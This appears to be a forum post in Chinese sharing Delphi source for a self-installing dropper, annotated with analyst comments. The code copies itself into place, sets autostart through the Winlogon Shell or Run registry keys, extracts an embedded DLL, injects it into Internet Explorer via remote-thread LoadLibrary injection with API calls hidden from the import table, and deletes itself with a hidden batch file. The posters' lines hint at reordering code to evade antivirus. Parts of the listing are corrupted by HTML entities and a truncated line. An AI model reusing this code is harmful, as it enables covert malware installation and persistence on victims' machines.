// 只要打乱一下主代码的顺序编译就OK了...


也无效

program Main;

// Analyst notes: this listing is a self-installing DLL injector (dropper) as
// posted on a forum. The comments added throughout describe what the visible
// code does so that its artefacts can be recognised; nothing here has been
// changed. Several helpers the code relies on (Gesy, judgesys, ExtractRes,
// DelValue, IEPath, Reg.AddValue) live in the non-standard units listed below
// and are not visible in this listing.
uses
  windows,
  RejoiceBase,
  SysUtils2,
  tlhelp32,
  Reg ;

// Links an object file. The `external` functions declared without a library
// name further down (xVirtualAllocEx, xCreateRemoteThread, xVirtualFreeEx)
// presumably resolve from it rather than from kernel32 -- confirm against
// SRT.obj.
{$L 'SRT.obj'}
// Embedded resources; the main block extracts a resource ('dllfile' / 'mydll')
// to disk via ExtractRes, so the payload DLL is carried inside this binary.
{$R RSRC.RES}
{$R 'Down.RES' 'Down.rc'}

const
{  ExeFiles='rejoice.exe';
  DLLFiles='rejoice.dll';
  //IEFiles ='Explorer.exe';
  IEFiles ='IEXPLORE.EXE';}
  // The commented-out block above shows the names originally used. The live
  // values are fixed-width X-filled PChar slots, which looks like fields meant
  // to be patched into the built binary afterwards -- assumption, confirm.
  ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
  DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
  IEFiles: PChar  = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
var
  PID: DWORD;                     // target process id returned by GetProcessID
  Process: DWORD;                 // handle from OpenProcess on PID
  DllAllpath: string;             // full path of the dropped DLL
  StartInfo: TStartupInfo;        // used for the suspended IE launch in the main block
  ProcInfo: TProcessInformation;  // ditto; neither is inspected afterwards

// Injection primitives declared `external` with no DLL name, so they are
// expected to come from the linked SRT.obj ({$L} above) instead of being
// imported from kernel32 by name. The signatures mirror the Win32 APIs of the
// same (un-prefixed) names. Presumably this keeps VirtualAllocEx /
// CreateRemoteThread out of the binary's import table; confirm against the
// object file and a built sample.
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;

function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;

// Program-level FileExists bound to shlwapi's PathFileExistsA. It is declared
// with a Delphi `string` parameter although the API takes a C string pointer;
// presumably this works because a long string is passed as a pointer to its
// first character -- not verified here.
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';

function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;


// Self-deletion. Writes a batch file under Gesy (apparently a directory path
// supplied by one of the project units -- confirm) that keeps trying to delete
// this executable (ParamStr(0)) until it is gone, then deletes itself, and
// runs that batch file as a hidden, idle-priority process.
// Artefacts for a defender: a file named 'Deleteme.bat' in that directory and
// a command interpreter spawned by the dropper that deletes its parent's image.
procedure ExtDelMe;
var
  F: textfile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  // Removes the NoRealMode value under the WinOldApp policy key (DelValue is
  // from the project's Reg unit). The reason is not visible in this listing;
  // possibly so the batch file can run on Win9x -- confirm.
  DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
  BatchFileName := Gesy + 'Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, ':try');
  WriteLn(F, 'del "' + ParamStr(0) + '"');                    // delete this executable
  WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');  // loop until the image is released
  WriteLn(F, 'del %0');                                        // then remove the batch file itself
  CloseFile(F);
  // Hidden window, idle priority; the dropper does not wait for the batch
  // process and just closes its handles.
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
  begin
   CloseHandle(ProcessInfo.hThread);
   CloseHandle(ProcessInfo.hProcess);
  end;
end;

// Returns aFilename with a number from Random(9999) inserted before the
// extension, retried until the resulting path does not exist (FileExists here
// is the shlwapi PathFileExistsA binding declared above). The main block uses
// it when the previously dropped DLL could not be deleted, so a defender may
// find several numbered copies of the DLL name in the drop directory.
function RandomFilename(aFilename: string): string;
var
  Path, Filename, Ext: string;
begin
  Result := aFilename;
  Path := ExtractFilepath(aFilename);
  Ext := ExtractFileExt(aFilename);
  Filename := ExtractFilename(aFilename);
  if Length(Ext) > 0 then
   Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));  // strip the extension
  repeat
   Result := Path + Filename + inttoStr(Random(9999)) + Ext;
  until not FileExists(Result);
end;

// Looks up a process id by image file name (basename only, case-insensitive)
// using a Toolhelp32 snapshot. Returns -1 when the snapshot cannot be created
// or no match is found. Because the loop body starts with Process32Next, the
// entry delivered by Process32First is never compared.
function GetProcessID(sProcName: string): Integer;
var
  hProcSnap: THandle;
  pe32: TProcessEntry32;
begin
  Result := -1;
  hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  if hProcSnap = INVALID_HANDLE_VALUE then Exit;
  pe32.dwSize := SizeOf(ProcessEntry32);
  if Process32First(hProcSnap, pe32) = True then
   while Process32Next(hProcSnap, pe32) = True do
   begin
    // compare only the file-name part of both, ignoring case
    if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
    begin
      Result := pe32.th32ProcessID;
      break;
    end;
   end;
  CloseHandle(hProcSnap);
end;


// Inject into the process
// Classic LoadLibrary injection: commit a read/write page in the target,
// copy the DLL path into it, start a remote thread at kernel32!LoadLibraryA
// with that page as its argument, wait for the thread, then release the page.
// Detection: the VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
// sequence against a browser process is exactly what EDR hooks and Sysmon's
// CreateRemoteThread event are built to surface. Because the x-prefixed
// primitives resolve from the linked object file, only WriteProcessMemory,
// GetModuleHandle and GetProcAddress are plain kernel32 calls here --
// assumption about the resulting import table, confirm on a built sample.
// Returns False if the allocation fails or no thread handle was obtained.
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
  BytesWritten: DWORD;
  Thread: DWORD;
  ThreadID: DWORD;
  Parameters: Pointer;
begin
  Result := False;
  Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
  if Parameters = nil then Exit;
  // Copies a full 4096 bytes starting at DLLPath (not the string length);
  // the return value is not checked.
  WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
  // LoadLibraryA's address is taken from this process; the remote thread gets
  // the page holding the path as its single argument.
  Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
  WaitForSingleObject(Thread, INFINITE);  // waits for the remote LoadLibraryA call to finish
  xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
end;


{procedure killer;
var
f:textfile;
begin
assignfile(f,ExtractFilePath(ParamStr(0))+'key.txt');
if not fileexists(ExtractFilePath(ParamStr(0))+'key.txt') then
   begin
   rewrite(f);
   closefile(f);
   end;
end; }

// Program entry: install and persist, then drop the embedded DLL and inject it
// into Internet Explorer. In this part of the posted listing apostrophes
// survive as the HTML entity &#39; (an extraction artefact), and the Winlogon
// Shell value is cut off after `'Explorer.exe ' +`, so the block does not
// compile as shown.
var
  isSetup: Bool;           // True when this run copied itself to SetupPathName
  SetupPathName: string;   // Gesy + ExeFiles: the install location
begin
  SetupPathName := Gesy + ExeFiles;
  // Not running from the install path yet: replace any copy already there
  // with this executable. Errors in the try block are swallowed.
  if (CompareText(paramstr(0), SetupPathName) <> 0) then
  begin
   try
    if FileExists(SetupPathName) then
    begin
      FilesetAttr(SetupPathName, 0);   // clear attributes, presumably so the delete succeeds
      DeleteFile(SetupPathName);
      if FileExists(SetupPathName) then
      begin
       Halt;                           // old copy still present: give up
       Exit;
      end;
    end;
    CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
   except
   end;
   isSetup := True;
   // Persistence via the project's Reg.AddValue. judgesys = 3 presumably
   // selects the NT family -- confirm. On that branch the Winlogon 'Shell'
   // value is replaced with 'Explorer.exe ' plus something missing from the
   // post; otherwise an HKCU Run value named ExeFiles is written. Both are
   // standard autostart locations covered by Autoruns and by registry-event
   // monitoring (e.g. Sysmon).
   if judgesys = 3 then
   begin
    Reg.AddValue(HKEY_LOCAL_MACHINE, &#39;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&#39;, &#39;Shell&#39;, pchar(&#39;Explorer.exe &#39;+), 1);
   end
   else
   begin
    Reg.AddValue(HKEY_CURRENT_USER, &#39;SoftWare\Microsoft\Windows\CurrentVersion\Run&#39;, ExeFiles, pchar(Gesy + ExeFiles), 1);
   end;
  end;
  // Single-instance check: a window of class 'Rejoice' titled 'Windows IDE'
  // is taken to mean the payload is already running (presumably created by
  // the injected DLL -- confirm). That window is a usable indicator.
  if FindWindow(&#39;Rejoice&#39;, &#39;Windows IDE&#39;) = 0 then
  begin
   DllAllpath := Gesy + DLLFiles;
   try
    FilesetAttr(DllAllpath, 0);
    DeleteFile(DllAllpath); { delete the existing DLL file }
   except
   end;
   if FileExists(DllAllpath) then { if deletion failed, use a different name }
   begin
    DllAllpath := RandomFilename(DllAllpath);
   end;
   if ExtractRes(&#39;dllfile&#39;, &#39;mydll&#39;, DllAllpath) then { write the DLL to inject out of the embedded resource }
   begin
    // Launch IE in a suspended state (IEPath comes from a project unit) so a
    // process with that image name exists; the program-level StartInfo /
    // ProcInfo globals are used. No ResumeThread is visible in this listing.
    if IEFiles = &#39;IEXPLORE.EXE&#39; then
    begin
    CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
    end;
    PID := GetProcessID(IEFiles);
    Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); { open the target process }
    InjectLibrary(Process, Pchar(DllAllpath));   // a PID of -1 is not checked; the handle is not closed
   end;
  end;
  if isSetup then
   ExtDelMe;   // this run installed a copy, so remove the original file
  Halt;
end.


再贴一下代码
